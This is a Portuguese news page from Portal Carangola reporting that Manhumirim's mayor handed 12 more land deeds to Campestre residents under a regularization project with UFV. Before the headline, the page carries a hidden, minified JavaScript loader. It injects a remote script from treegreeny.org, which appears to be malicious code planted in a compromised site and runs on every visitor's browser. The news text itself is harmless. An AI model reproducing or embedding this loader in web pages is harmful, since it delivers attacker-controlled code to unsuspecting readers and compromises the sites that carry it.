;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhumirim-Projeto de Regularização Fundiária: Prefeitura entrega mais 12 escrituras . - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhumirim-Projeto de Regularização Fundiária: Prefeitura entrega mais 12 escrituras .

O projeto que trata da regularização fundiária no âmbito do município de Manhumirim começa a virar realidade com a entrega das primeiras escrituras, após um longo trabalho realizado pela Universidade Federal de Viçosa (UFV), com a qual a prefeitura firmou parceria, numa iniciativa do prefeito Ronaldo Lopes.
No último dia 15 de Fevereiro, mais 12 moradores do bairro Campestre receberam a escritura definitiva do terreno que possuem. A cidade tem hoje vários loteamentos em situação irregular. Tais irregularidades impedem, por exemplo, que seus proprietários obtenham título definitivo de propriedade e façam financiamento bancário para reforma e ampliação dos imóveis. Encaminhado pelo prefeito Ronaldo Lopes à Câmara Municipal e aprovado na reunião do dia 09 de Dezembro de 2010 e em seguida, sancionado pelo prefeito, o projeto está possibilitando a prefeitura realizar um desejo antigo dos moradores, que é ter a escritura do terreno onde moram. O prefeito Ronaldo Lopes entregou as novas  escrituras na inauguração da ampliação da Escola Municipal “Alair José Dias”, educandário que já está funcionando em tempo integral, beneficiando diversas famílias. Nos próximos dias mais escrituras vão ser entregues, num total de cerca de 2000. Em 24 de Dezembro de 2011, outras 15 famílias já haviam recebido as escrituras. Os moradores estão recebendo o documento a custo zero para eles.

Valdir Vieira – Assessoria de Comunicação – Prefeitura de Manhumirim


Ofertas


Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.